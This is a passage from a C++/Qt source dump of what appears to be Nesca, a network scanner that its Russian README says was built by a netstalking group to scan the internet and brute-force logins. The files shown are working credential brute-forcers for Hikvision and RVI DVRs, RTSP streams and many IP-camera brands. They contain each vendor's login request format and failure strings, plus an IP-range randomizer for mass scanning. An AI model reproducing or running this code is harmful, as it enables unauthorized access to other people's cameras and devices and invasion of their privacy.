long*)&sa.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; 409 | #endif 410 | else return -1; 411 | 412 | SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 413 | if (sock == INVALID_SOCKET) return -1; 414 | 415 | struct linger linger = { 1, gTimeOut }; 416 | setsockopt(sock, SOL_SOCKET, SO_LINGER, (const char *)&linger, sizeof(linger)); 417 | 418 | int res = connect(sock, (sockaddr*)&sa, sizeof(sa)); 419 | int bTO; 420 | 421 | char newlp[32] = {0}; 422 | memcpy(newlp, loginRVIHeaderStart, 8); 423 | memcpy(newlp + 8, login, strlen(login)); 424 | memcpy(newlp + 16, pass, strlen(pass)); 425 | memcpy(newlp + 24, loginRVIHeaderEnd, 8); 426 | 427 | if (res != SOCKET_ERROR) { 428 | send(sock, newlp, 32, 0); 429 | Activity += strlen(newlp); 430 | stt->doEmitionAddOutData(QString(newlp)); 431 | char buff[32] = { 0 }; 432 | recvWT(sock, buff, 16, gTimeOut, &bTO); 433 | Activity += strlen(buff); 434 | stt->doEmitionAddIncData(QString(sDVRIP) + ":" + QString::number(wDVRPort), QString(buff)); 435 | 436 | shutdown(sock, SD_BOTH); 437 | closesocket(sock); 438 | 439 | if (buff[9] == 0x08) return 0; 440 | else return -1; 441 | } 442 | 443 | shutdown(sock, SD_BOTH); 444 | closesocket(sock); 445 | return -1; 446 | } 447 | 448 | #include "Utils.h" 449 | lopaStr HikVis::rviLogin(const char * sDVRIP, int wDVRPort) 450 | { 451 | lopaStr lps = { "UNKNOWN", "", "" }; 452 | int passCounter = 0; 453 | char ip[64] = { 0 }; 454 | strcpy(ip, sDVRIP); 455 | int rowIndex = -1; 456 | 457 | char login[32] = { 0 }; 458 | char pass[32] = { 0 }; 459 | 460 | for (int i = 0; i < MaxLogin; ++i) { 461 | FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; }); 462 | strcpy(login, loginLst[i]); 463 | for (int j = 0; j < MaxPass; ++j) { 464 | FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; }); 465 | if (!globalScanFlag) return lps; 466 | strcpy(pass, passLst[j]); 467 | 468 | if (strlen(login) > 8) break; 469 | if (strlen(pass) > 8) continue; 470 | 471 | if (rvi_login_ptr(ip, wDVRPort, login, pass) == 0) { 472 | strcpy(lps.login, login); 473 | strcpy(lps.pass, pass); 474 | 475 | rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), "OK", rowIndex); 476 | 477 | return lps; 478 | } 479 | 480 | rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex); 481 | 482 | ++passCounter; 483 | Sleep(200); 484 | } 485 | } 486 | 487 | rowIndex = Utils::addBARow(QString(ip) + ":" + QString::number(wDVRPort), "--", "FAIL", rowIndex); 488 | 489 | return lps; 490 | } 491 | 492 | 493 | lopaStr HikVis::HVLobby(const char *ip, const int port) { 494 | if (gMaxBrutingThreads > 0) { 495 | 496 | while (BrutingThrds >= gMaxBrutingThreads) Sleep(1000); 497 | 498 | ++baCount; 499 | ++BrutingThrds; 500 | stt->doEmitionUpdateArc(gTargets); 501 | const lopaStr &lps = hikLogin(ip, port); 502 | --BrutingThrds; 503 | 504 | return lps; 505 | } 506 | else { 507 | lopaStr lps = { "UNKNOWN", "", "" }; 508 | return lps; 509 | } 510 | } 511 | 512 | lopaStr HikVis::RVILobby(const char *ip, const int port) { 513 | if (gMaxBrutingThreads > 0) { 514 | 515 | while (BrutingThrds >= gMaxBrutingThreads) Sleep(1000); 516 | 517 | ++baCount; 518 | ++BrutingThrds; 519 | stt->doEmitionUpdateArc(gTargets); 520 | const lopaStr &lps = rviLogin(ip, port); 521 | --BrutingThrds; 522 | 523 | return lps; 524 | } 525 | else { 526 | lopaStr lps = { "UNKNOWN", "", "" }; 527 | return lps; 528 | } 529 | } -------------------------------------------------------------------------------- /HikvisionLogin.h: -------------------------------------------------------------------------------- 1 | #ifndef HIKVISIONLOGIN_H 2 | #define HIKVISIONLOGIN_H 3 | 4 | #include "STh.h" 5 | #include "mainResources.h" 6 | 7 | class HikVis { 8 | public: static bool isInitialized; 9 | 10 | private: lopaStr hikLogin(const char * sDVRIP, int wDVRPort); 11 | lopaStr rviLogin(const char * sDVRIP, int wDVRPort); 12 | 13 | public: 14 | static int hikCounter; 15 | static int rviCounter; 16 | static int hikPart; 17 | static int rviPart; 18 | public: 19 | static bool checkHikk(const char * sDVRIP, int port); 20 | static bool checkRVI(const char * sDVRIP, int port); 21 | static bool checkSAFARI(const char * sDVRIP, int port); 22 | void hikInit(); 23 | void hikCleanup(); 24 | lopaStr HVLobby(const char *ip, const int port); 25 | lopaStr RVILobby(const char *ip, const int port); 26 | }; 27 | 28 | #endif // HIKVISIONLOGIN_H -------------------------------------------------------------------------------- /IPCAuth.cpp: -------------------------------------------------------------------------------- 1 | #include "IPCAuth.h" 2 | #include "Utils.h" 3 | #include "BruteUtils.h" 4 | #include "FileUpdater.h" 5 | 6 | #include 7 | #include 8 | std::string urlEncode(const string &value) { 9 | ostringstream escaped; 10 | escaped.fill('0'); 11 | escaped << hex; 12 | 13 | for (string::const_iterator i = value.begin(), n = value.end(); i != n; ++i) { 14 | string::value_type c = (*i); 15 | 16 | // Keep alphanumeric and other accepted characters intact 17 | if (isalnum(c) || c == '-' || c == '_' || c == '.' || c == '~') { 18 | escaped << c; 19 | continue; 20 | } 21 | 22 | // Any other characters are percent-encoded 23 | escaped << uppercase; 24 | escaped << '%' << setw(2) << int((unsigned char)c); 25 | escaped << nouppercase; 26 | } 27 | 28 | return escaped.str(); 29 | } 30 | 31 | lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *cookie) 32 | { 33 | lopaStr lps = {"UNKNOWN", "", ""}; 34 | int result = 0; 35 | char login[128] = {0}; 36 | char pass[128] = {0}; 37 | char request[1024] = {0}; 38 | int passCounter = 1; 39 | int rowIndex = -1; 40 | 41 | std::vector negVector; 42 | std::vector slideVector; 43 | if(strcmp(SPEC, "IPC") == 0) 44 | { 45 | negVector.push_back("Invalid"); 46 | } 47 | else if(strcmp(SPEC, "GEO") == 0) 48 | { 49 | negVector.push_back("Access denied"); 50 | negVector.push_back("ErrNoSuchUsr.htm"); 51 | } 52 | else if(strcmp(SPEC, "EasyCam") == 0) 53 | { 54 | negVector.push_back("Set-Cookie: usrLevel=-1;path=/"); 55 | } 56 | else if(strcmp(SPEC, "Foscam") == 0) 57 | { 58 | negVector.push_back("0"); 59 | negVector.push_back("-1"); 60 | negVector.push_back("-2"); 61 | negVector.push_back("-3"); 62 | negVector.push_back("-4"); 63 | negVector.push_back("-5"); 64 | negVector.push_back("-6"); 65 | negVector.push_back("-7"); 66 | } 67 | else if(strcmp(SPEC, "AVIOSYS") == 0) 68 | { 69 | negVector.push_back("Password Error"); 70 | } 71 | else if(strcmp(SPEC, "BUFFALO") == 0) 72 | { 73 | negVector.push_back("403 Forbidden"); 74 | } 75 | else if(strcmp(SPEC, "DVS") == 0) 76 | { 77 | negVector.push_back("Non-Existed"); 78 | } 79 | else if(strcmp(SPEC, "IPCAM") == 0) 80 | { 81 | negVector.push_back("var check=\"0\""); 82 | negVector.push_back("var authLevel =\"0\";"); 83 | } 84 | else if (strcmp(SPEC, "IEORFOREFOX") == 0) 85 | { 86 | negVector.push_back("AAA()"); 87 | negVector.push_back("Имя или пароль неверные!"); 88 | negVector.push_back("Возврат"); 89 | negVector.push_back("HTTP/1.0 302 Found"); 90 | negVector.push_back("is incorrect"); 91 | } 92 | else if (strcmp(SPEC, "MASPRO") == 0) 93 | { 94 | negVector.push_back("action=\"setup_login.cgi\""); 95 | } 96 | else if (strcmp(SPEC, "WEBCAMXP") == 0) 97 | { 98 | negVector.push_back("Not logged in"); 99 | } 100 | else if (strcmp(SPEC, "JASSUN") == 0) 101 | { 102 | negVector.push_back("Log in failed"); 103 | } 104 | else if (strcmp(SPEC, "BEWARD") == 0) 105 | { 106 | negVector.push_back("/error.asp"); 107 | } 108 | else if (strcmp(SPEC, "JUAN") == 0) 109 | { 110 | negVector.push_back("errno=\"4\""); 111 | } 112 | else if (strcmp(SPEC, "ACTi") == 0) 113 | { 114 | negVector.push_back("ERROR: "); 115 | } 116 | else if (strcmp(SPEC, "AirOS") == 0) 117 | { 118 | negVector.push_back("Invalid credentials"); 119 | } 120 | else if (strcmp(SPEC, "XMSECU") == 0) 121 | { 122 | slideVector.push_back("errornumber=-1"); 123 | negVector.push_back("Log in failed"); 124 | } 125 | else 126 | { 127 | stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!"); 128 | return lps; 129 | }; 130 | 131 | int res = 0; 132 | for(int i = 0; i < MaxLogin; ++i) 133 | { 134 | if(!globalScanFlag) break; 135 | FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; }); 136 | strcpy(login, loginLst[i]); 137 | if(strcmp(login, " ") == 0) continue; 138 | 139 | for(int j = 0; j < MaxPass; ++j) 140 | { 141 | FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;}); 142 | if(!globalScanFlag) break; 143 | if(strcmp(passLst[j], " ") == 0) continue; 144 | result = 0; 145 | 146 | strcpy(pass, passLst[j]); 147 | 148 | ZeroMemory(request, sizeof(request)); 149 | request[0] = 0; 150 | if(strcmp(SPEC, "IPC") == 0) 151 | { 152 | sprintf(request, "%s/login.xml?user=%s&usr=%s&password=%s&pwd=%s", 153 | ip, login, login, pass, pass); 154 | } 155 | else if(strcmp(SPEC, "GEO") == 0) 156 | { 157 | sprintf(request, "%s/Login.cgi?username=%s&password=%s", 158 | ip, login, pass); 159 | } 160 | else if(strcmp(SPEC, "EasyCam") == 0) 161 | { 162 | sprintf(request, "%s/login.xml?user=%s&usr=%s&password=%s&pwd=%s", 163 | ip, login, login, pass, pass); 164 | } 165 | else if(strcmp(SPEC, "Foscam") == 0) 166 | { 167 | sprintf(request, "%s/cgi-bin/CGIProxy.fcgi?usr=%s&pwd=%s&cmd=logIn&usrName=%s&pwd=%s", 168 | ip, login, pass, login, pass); 169 | } 170 | else if(strcmp(SPEC, "AVIOSYS") == 0) 171 | { 172 | sprintf(request, "%s/check_user.html?UserName=%s&PassWord=%s", 173 | ip, login, pass); 174 | } 175 | else if(strcmp(SPEC, "IPCAM") == 0) 176 | { 177 | sprintf(request, "%s/cgi-bin/hi3510/checkuser.cgi?&-name=%s&-passwd=%s&-time=1416767330831", 178 | ip, login, pass); 179 | } 180 | else if(strcmp(SPEC, "IEORFOREFOX") == 0) 181 | { 182 | doPost = true; 183 | sprintf(request, "%s/logincheck.rsp?type=1", ip); 184 | sprintf(postData, "username=%s&userpwd=%s", login, pass); 185 | } 186 | else if(strcmp(SPEC, "BUFFALO") == 0) 187 | { 188 | doPost = true; 189 | sprintf(request, "%s/rpc/login", ip); 190 | sprintf(postData, "user=%s&password=%s", login, pass); 191 | } 192 | else if (strcmp(SPEC, "DVS") == 0) 193 | { 194 | doPost = true; 195 | sprintf(request, "%s/login", ip); 196 | sprintf(postData, "langs=en&user=%s&password=%s&submit=+Login+", login, pass); 197 | } 198 | else if (strcmp(SPEC, "MASPRO") == 0) 199 | { 200 | doPost = true; 201 | sprintf(request, "%s/setup_login.cgi", ip); 202 | sprintf(postData, "check_username=%s&check_password=%s&login=", login, pass); 203 | } 204 | else if (strcmp(SPEC, "WEBCAMXP") == 0) 205 | { 206 | doPost = true; 207 | sprintf(request, "%s/login.html", ip); 208 | sprintf(postData, "username=%s&password=%s&Redir=/", login, pass); 209 | } 210 | else if (strcmp(SPEC, "JASSUN") == 0) 211 | { 212 | doPost = true; 213 | sprintf(request, "%s/Login.htm", ip); 214 | sprintf(postData, "command=login&username=%s&password=%s", login, pass); 215 | } 216 | else if (strcmp(SPEC, "BEWARD") == 0) 217 | { 218 | sprintf(request, "%s/webs/httplogin?username=%s&password=%s&UserID=45637757", 219 | ip, login, pass); 220 | } 221 | else if (strcmp(SPEC, "JUAN") == 0) 222 | { 223 | std::string encodedLogin = urlEncode(std::string(login)); 224 | std::string encodedPass = urlEncode(std::string(pass)); 225 | sprintf(request, "%s/cgi-bin/gw.cgi?xml=%%3Cjuan%%20ver=%%22%%22%%20squ=%%22%%22%%20dir=%%22%%22%%3E%%3Cenvload%%20type=%%220%%22%%20usr=%%22%s%%22%%20pwd=%%22%s%%22/%%3E%%3C/juan%%3E&_=1450923182693", 226 | ip, encodedLogin.c_str(), encodedPass.c_str()); 227 | } 228 | else if (strcmp(SPEC, "ACTi") == 0) 229 | { 230 | doPost = true; 231 | sprintf(request, "%s/cgi-bin/videoconfiguration.cgi", ip); 232 | sprintf(postData, "LOGIN_ACCOUNT=%s&LOGIN_PASSWORD=%s", login, pass); 233 | } 234 | else if (strcmp(SPEC, "AirOS") == 0) 235 | { 236 | doPost = true; 237 | sprintf(request, "%s/login.cgi", ip); 238 | char tempPostData[1024] = { 0 }; 239 | int cl = 341 + strlen(login) + strlen(pass); 240 | sprintf(tempPostData, "-----------------------------170381307613422\r\n\ 241 | Content-Disposition: form-data; name=\"uri\"\r\n\ 242 | \r\n\ 243 | /\r\n\ 244 | -----------------------------170381307613422\r\n\ 245 | Content-Disposition: form-data; name=\"username\"\r\n\ 246 | \r\n\ 247 | %s\r\n\ 248 | -----------------------------170381307613422\r\n\ 249 | Content-Disposition: form-data; name=\"password\"\r\n\ 250 | \r\n\ 251 | %s\r\n\ 252 | -----------------------------170381307613422--\ 253 | \r\n", login, pass); 254 | 255 | sprintf(postData, "Content-Type: multipart/form-data; boundary=---------------------------170381307613422\r\n\ 256 | Content-Length: %d\r\n\r\n\ 257 | %s", cl, tempPostData); 258 | } 259 | else if (strcmp(SPEC, "XMSECU") == 0) 260 | { 261 | doPost = true; 262 | sprintf(request, "%s/Login.htm", ip); 263 | sprintf(postData, "command=login&username=%s&password=%s", login, pass); 264 | } 265 | 266 | std::string buffer; 267 | if (cookie->size() > 0) { 268 | std::vector cookieHeader{ *cookie }; 269 | Connector con; 270 | if (doPost) res = con.nConnect(request, port, &buffer, postData, &cookieHeader); 271 | else res = con.nConnect(request, port, &buffer, NULL, &cookieHeader); 272 | } 273 | else { 274 | Connector con; 275 | if (doPost) res = con.nConnect(request, port, &buffer, postData); 276 | else res = con.nConnect(request, port, &buffer); 277 | } 278 | 279 | if (res == -2) { 280 | rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex); 281 | return lps; 282 | } 283 | else if (res != -1) { 284 | for (int i = 0; i < slideVector.size(); ++i) 285 | { 286 | if (Utils::ustrstr(buffer, slideVector[i]) != -1) 287 | { 288 | result = -1; 289 | break; 290 | }; 291 | } 292 | if (-1 == result) { 293 | passCounter += MaxPass - 1; 294 | break; 295 | } 296 | 297 | for (int i = 0; i < negVector.size(); ++i) 298 | { 299 | if (Utils::ustrstr(buffer, negVector[i]) != -1) 300 | { 301 | result = 1; 302 | break; 303 | }; 304 | }; 305 | 306 | if (0 == result) 307 | { 308 | strcpy(lps.login, login); 309 | strcpy(lps.pass, pass); 310 | 311 | rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex); 312 | 313 | return lps; 314 | } 315 | } 316 | else { 317 | return lps; 318 | } 319 | 320 | rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex); 321 | ++passCounter; 322 | Sleep(100); 323 | }; 324 | }; 325 | 326 | rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex); 327 | return lps; 328 | } 329 | 330 | lopaStr IPC::IPCLobby(const char *ip, int port, char *SPEC, const std::string *cookie) { 331 | if(gMaxBrutingThreads > 0) { 332 | while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000); 333 | 334 | ++baCount; 335 | ++BrutingThrds; 336 | stt->doEmitionUpdateArc(gTargets); 337 | lopaStr lps = IPCBrute(ip, port, SPEC, cookie); 338 | --BrutingThrds; 339 | 340 | return lps; 341 | } else { 342 | lopaStr lps = {"UNKNOWN", "", ""}; 343 | return lps; 344 | } 345 | } 346 | -------------------------------------------------------------------------------- /IPCAuth.h: -------------------------------------------------------------------------------- 1 | #ifndef IPCAUTH_H 2 | #define IPCAUTH_H 3 | 4 | #include "Connector.h" 5 | #include "mainResources.h" 6 | 7 | class IPC { 8 | private: 9 | bool doPost; 10 | char postData[1024]; 11 | private: 12 | lopaStr IPCBrute(const char *ip, int port, char *SPEC, const std::string *cookie); 13 | 14 | public: 15 | IPC() { 16 | doPost = false; 17 | //ZeroMemory(postData, 1024); 18 | postData[0] = 0; 19 | } 20 | 21 | lopaStr IPCLobby(const char *ip, int port, char *SPEC, const std::string *cookie); 22 | }; 23 | 24 | #endif // IPCAUTH_H 25 | -------------------------------------------------------------------------------- /IPRandomizer.cpp: -------------------------------------------------------------------------------- 1 | #include "IPRandomizer.h" 2 | 3 | 4 | IPRandomizer::IPRandomizer(std::vector ipRangeVec, int shuffleGap) 5 | { 6 | this->ipRangeVec = ipRangeVec; 7 | this->shuffleGap = shuffleGap; 8 | 9 | for (int i = 0; i < ipRangeVec.size(); ++i) { 10 | this->shuffleOffset.push_back(0); 11 | } 12 | } 13 | 14 | 15 | IPRandomizer::~IPRandomizer() 16 | { 17 | this->ipRangeVec.clear(); 18 | this->shuffleOffset.clear(); 19 | } 20 | 21 | void IPRandomizer::shuffleRange() { 22 | for (int i = 0; i < this->ipRangeVec.size(); ++i) { 23 | IPRangeHolder ipRangeHolder = this->ipRangeVec[i]; 24 | if (ipRangeHolder.ip1 + this->shuffleOffset[i] >= ipRangeHolder.ip2) { 25 | continue; 26 | } 27 | 28 | unsigned int rangeSize = ipRangeHolder.ip2 - (ipRangeHolder.ip1 + this->shuffleOffset[i] - 1); 29 | int offset = (rangeSize < this->shuffleGap ? rangeSize : this->shuffleGap); 30 | 31 | for (unsigned int j = this->shuffleOffset[i]; j < this->shuffleOffset[i] + offset; ++j) { 32 | this->shuffledRange.push_back(ipRangeHolder.ip1 + j); 33 | } 34 | 35 | this->shuffleOffset[i] += offset; 36 | } 37 | std::random_shuffle(this->shuffledRange.begin(), this->shuffledRange.end()); 38 | } 39 | 40 | unsigned int IPRandomizer::getNext() { 41 | if (this->shuffledRange.empty()) { 42 | shuffleRange(); 43 | 44 | //If still empty then ip-range chunk is depleted. 45 | if (this->shuffledRange.empty()) { 46 | return 0; 47 | }; 48 | }; 49 | 50 | unsigned int ip = this->shuffledRange[0]; 51 | this->shuffledRange.erase(this->shuffledRange.begin()); 52 | return ip; 53 | } 54 | -------------------------------------------------------------------------------- /IPRandomizer.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef RAND_H 3 | #define RAND_H 4 | 5 | #include 6 | #include 7 | 8 | struct IPRangeHolder { 9 | unsigned int ip1; 10 | unsigned int ip2; 11 | }; 12 | 13 | class IPRandomizer 14 | { 15 | private: 16 | std::vector ipRangeVec; 17 | std::vector shuffledRange; 18 | std::vector shuffleOffset; 19 | int shuffleGap = 20000; 20 | private: 21 | void shuffleRange(); 22 | public: 23 | IPRandomizer(std::vector ipRangeVec, int shuffleGap = 20000); 24 | IPRandomizer(std::vector ipRangeVec); 25 | ~IPRandomizer(); 26 | 27 | unsigned int getNext(); 28 | }; 29 | 30 | #endif -------------------------------------------------------------------------------- /MainStarter.h: -------------------------------------------------------------------------------- 1 | #ifndef MAINSTARTER_H 2 | #define MAINSTARTER_H 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include "externData.h" 11 | #include "mainResources.h" 12 | #include "STh.h" 13 | #include "Threader.h" 14 | #include "FileUpdater.h" 15 | #include "Connector.h" 16 | #include "Utils.h" 17 | #include "IPRandomizer.h" 18 | #include "HikvisionLogin.h" 19 | 20 | class MainStarter { 21 | private: char dnsTarget[256]; 22 | int ipsstart[4], ipsend[4]; 23 | static unsigned int **ipsstartfl, **ipsendfl; 24 | unsigned long ip1, ip2; 25 | static int gflIndex; 26 | 27 | private: 28 | void startIPScan(); 29 | void startDNSScan(); 30 | void startImportScan(); 31 | int loadPorts(const char *data, char delim); 32 | int loadTargets(const char *data); 33 | 34 | public: 35 | static std::vector portVector; 36 | static int flCounter; 37 | static bool savingBackUpFile; 38 | void saveBackupToFile(); 39 | void saveBK(); 40 | 41 | public: 42 | MainStarter() 43 | { 44 | horLineFlag = false; 45 | PieCamerasC1 = 0, PieBA = 0, PieOther = 0, PieSSH = 0; 46 | camerasC1 = 0, baCount = 0, filtered = 0, Overl = 0, Alive = 0, Activity = 0, saved = 0, other = 0; 47 | BrutingThrds = 0; 48 | found = 0; 49 | gTargets = 0; 50 | cons = 0; 51 | found = 0; 52 | indexIP = 0; 53 | flCounter = 0; 54 | gflIndex = 0; 55 | /* 56 | ZeroMemory(ipsstart, sizeof(ipsstart)); 57 | ZeroMemory(ipsend, sizeof(ipsend));*/ 58 | ipsstart[0] = 0; 59 | ipsend[0] = 0; 60 | } 61 | ~MainStarter(){ 62 | FileUpdater::FUClear(); 63 | Threader::cleanUp(); 64 | curl_global_cleanup(); 65 | 66 | while (savingBackUpFile) Sleep(100); 67 | 68 | FileUpdater::negativeVector.clear(); 69 | if (loginLst != NULL) 70 | { 71 | for (int i = 0; i < MaxLogin; ++i) delete[] loginLst[i]; 72 | delete[] loginLst; 73 | loginLst = NULL; 74 | }; 75 | if (passLst != NULL) 76 | { 77 | for (int i = 0; i < MaxPass; ++i) delete[] passLst[i]; 78 | delete[] passLst; 79 | passLst = NULL; 80 | }; 81 | if (wfPassLst != NULL) 82 | { 83 | for (int i = 0; i < MaxWFPass; ++i) delete[] wfPassLst[i]; 84 | delete[] wfPassLst; 85 | wfPassLst = NULL; 86 | }; 87 | if (wfLoginLst != NULL) 88 | { 89 | for (int i = 0; i < MaxWFLogin; ++i) delete[] wfLoginLst[i]; 90 | delete[] wfLoginLst; 91 | wfLoginLst = NULL; 92 | }; 93 | if (ftpPassLst != NULL) 94 | { 95 | for (int i = 0; i < MaxFTPPass; ++i) delete[] ftpPassLst[i]; 96 | delete[] ftpPassLst; 97 | ftpPassLst = NULL; 98 | }; 99 | if (ftpLoginLst != NULL) 100 | { 101 | for (int i = 0; i < MaxFTPLogin; ++i) delete[] ftpLoginLst[i]; 102 | delete[] ftpLoginLst; 103 | ftpLoginLst = NULL; 104 | }; 105 | if (sshlpLst != NULL) 106 | { 107 | for (int i = 0; i < MaxSSHPass; ++i) delete[] sshlpLst[i]; 108 | delete[] sshlpLst; 109 | sshlpLst = NULL; 110 | }; 111 | if (ipsstartfl != NULL) 112 | { 113 | for (int i = 0; i < flCounter; ++i) delete[] ipsstartfl[i]; 114 | delete[] ipsstartfl; 115 | ipsstartfl = NULL; 116 | }; 117 | if (ipsendfl != NULL) 118 | { 119 | for (int i = 0; i < flCounter; ++i) delete[] ipsendfl[i]; 120 | delete[] ipsendfl; 121 | ipsendfl = NULL; 122 | }; 123 | 124 | unBlockButtons(); 125 | } 126 | 127 | void unBlockButtons(); 128 | void runAuxiliaryThreads(); 129 | void saver(); 130 | int fileLoader(const char *fileName); 131 | static void createResultFiles(); 132 | void start(const char* targets, const char* ports); 133 | }; 134 | 135 | #endif // MAINSTARTER_H -------------------------------------------------------------------------------- /PropertySheet.props: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /PropertySheet1.props: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Nesca 2 | ---- 3 | Сканер сети. Легендарный. Твой. 4 | 5 | ![Nesca](examples/old_nesca.png) 6 | 7 | ### История возникновения 8 | 9 | Был разработан нетсталкерской группой ISKOPASI как универсальный сканер для всего сущего^W Интернета, брута, отсева и собирания базы находочек. База находок ныне мертва, группа тоже. 10 | 11 | ### Бинарники 12 | 13 | [Билд win32 старой версии 24D87-801](https://mega.nz/#!yZV3UDpY!6D5k-Dd1amF0i_rzIhFM-WU7cdN3pxR2mwsYiIqedtU), пароль - 24D87-801 14 | 15 | ### Самостоятельная сборка 16 | 17 | Для компиляции необходимы `libssh`, `openssl` и `Qt`. Под Windows компилировать через MinGW. 18 | 19 | Установка необходимого под Ubuntu: 20 | 21 | 1. [Официальный дистрибутив Qt5](https://wiki.qt.io/Install_Qt_5_on_Ubuntu) 22 | 23 | 2. Пакеты зависимостей: 24 | 25 | ``` 26 | sudo apt-get install qtmultimedia5-dev libqt5multimediawidgets5 libqt5multimedia5-plugins libqt5multimedia5 libssh-dev 27 | ``` 28 | 29 | Сборка: 30 | 31 | ``` 32 | git clone https://github.com/netstalking-core/nesca.git 33 | qmake 34 | make 35 | ``` 36 | 37 | ### Сборка с помощью Docker 38 | 39 | Можно сбилдить с помощью контейнера на основе Ubuntu 14.04, достаточно одной команды в директории с репозиторием: 40 | ``` 41 | docker build . 42 | ``` 43 | 44 | Для запуска Nesca прямо из контейнера выполнить: 45 | ``` 46 | docker run -i -e DISPLAY=$DISPLAY -v /tmp/.X11-unix/:/tmp/.X11-unix 47 | ``` 48 | -------------------------------------------------------------------------------- /RTSP.cpp: -------------------------------------------------------------------------------- 1 | #include "RTSP.h" 2 | 3 | int checkOutput(const string *buffer, const char *ip, const int port) { 4 | if (Utils::ustrstr(buffer, "not found") != -1) { 5 | return -1; 6 | } 7 | else if (Utils::ustrstr(buffer, "200 OK") != -1) { 8 | return 1; 9 | } 10 | 11 | return 0; 12 | }; 13 | 14 | lopaStr RTSP::RTSPBrute(const char *ip, const int port) { 15 | 16 | lopaStr lps = (lopaStr){ "UNKNOWN", "", "[RTSP]" }; 17 | string lpString; 18 | int passCounter = 0; 19 | int rowIndex = -1; 20 | int timeoutCounter = 0; 21 | std::string buffer; 22 | 23 | bool isDigest = true; 24 | std::string buff; 25 | Connector con; 26 | int res = con.checkIsDigestRTSP(ip, &buff); 27 | 28 | if (2 == res) { 29 | lps = (lopaStr){ "", "", "" }; 30 | rowIndex = Utils::addBARow(QString(ip), "Empty", "OK", rowIndex); 31 | 32 | return lps; 33 | } 34 | else if (-1 == res) { 35 | rowIndex = Utils::addBARow(QString(ip), "--", "404", rowIndex); 36 | 37 | strcpy(lps.other, "404"); 38 | return lps; 39 | } 40 | else if (1 == res) { 41 | isDigest = true; 42 | } 43 | else if (0 == res) { 44 | isDigest = false; 45 | } 46 | 47 | char login[32] = { 0 }; 48 | char pass[32] = { 0 }; 49 | for (int i = 0; i < MaxLogin; ++i) { 50 | FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; }); 51 | strcpy(login, loginLst[i]); 52 | for (int j = 0; j < MaxPass; ++j) { 53 | FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; }); 54 | if (!globalScanFlag) return lps; 55 | strcpy(pass, passLst[j]); 56 | 57 | lpString = string(login) + ":" + string(pass); 58 | 59 | Connector con; 60 | res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString, false, true, isDigest); 61 | 62 | if (res != -1) { 63 | res = checkOutput(&buffer, ip, port); 64 | if (res == -1) { 65 | rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "404", rowIndex); 66 | return lps; 67 | } else if (res == 1) { 68 | rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex); 69 | 70 | strcpy(lps.login, pass); 71 | strcpy(lps.pass, pass); 72 | return lps; 73 | }; 74 | } 75 | else { 76 | if (timeoutCounter++ > 3) { 77 | rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "TIMEOUT", rowIndex); 78 | return lps; 79 | } 80 | } 81 | 82 | rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex); 83 | 84 | ++passCounter; 85 | Sleep(50); 86 | } 87 | } 88 | 89 | rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex); 90 | 91 | return lps; 92 | }; 93 | 94 | lopaStr RTSP::RTSPLobby(const char *ip, const int port) { 95 | if (gMaxBrutingThreads > 0) { 96 | 97 | while (BrutingThrds >= gMaxBrutingThreads) Sleep(1000); 98 | 99 | ++baCount; 100 | ++BrutingThrds; 101 | stt->doEmitionUpdateArc(gTargets); 102 | const lopaStr &lps = RTSPBrute(ip, port); 103 | --BrutingThrds; 104 | 105 | return lps; 106 | } 107 | else { 108 | lopaStr lps = (lopaStr){ "UNKNOWN", "", "" }; 109 | return lps; 110 | } 111 | } -------------------------------------------------------------------------------- /RTSP.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #ifndef RTSPAUTH_H 3 | #define RTSPAUTH_H 4 | 5 | #include "Utils.h" 6 | #include "Connector.h" 7 | #include "externData.h" 8 | #include "mainResources.h" 9 | 10 | class RTSP 11 | { 12 | private: 13 | static lopaStr RTSPBrute(const char *ip, const int port); 14 | public: 15 | static lopaStr RTSPLobby(const char *ip, const int port); 16 | }; 17 | 18 | #endif // RTSPAUTH_H 19 | 20 | -------------------------------------------------------------------------------- /SSHAuth.cpp: -------------------------------------------------------------------------------- 1 | #include "SSHAuth.h" 2 | #include "FileUpdater.h" 3 | 4 | int _sshConnect(const char *user, const char *pass, const char *host, int port) { 5 | 6 | CURL *curl = curl_easy_init(); 7 | char hostStr[128] = {0}; 8 | strcpy(hostStr, user); 9 | strcat(hostStr, "@"); 10 | 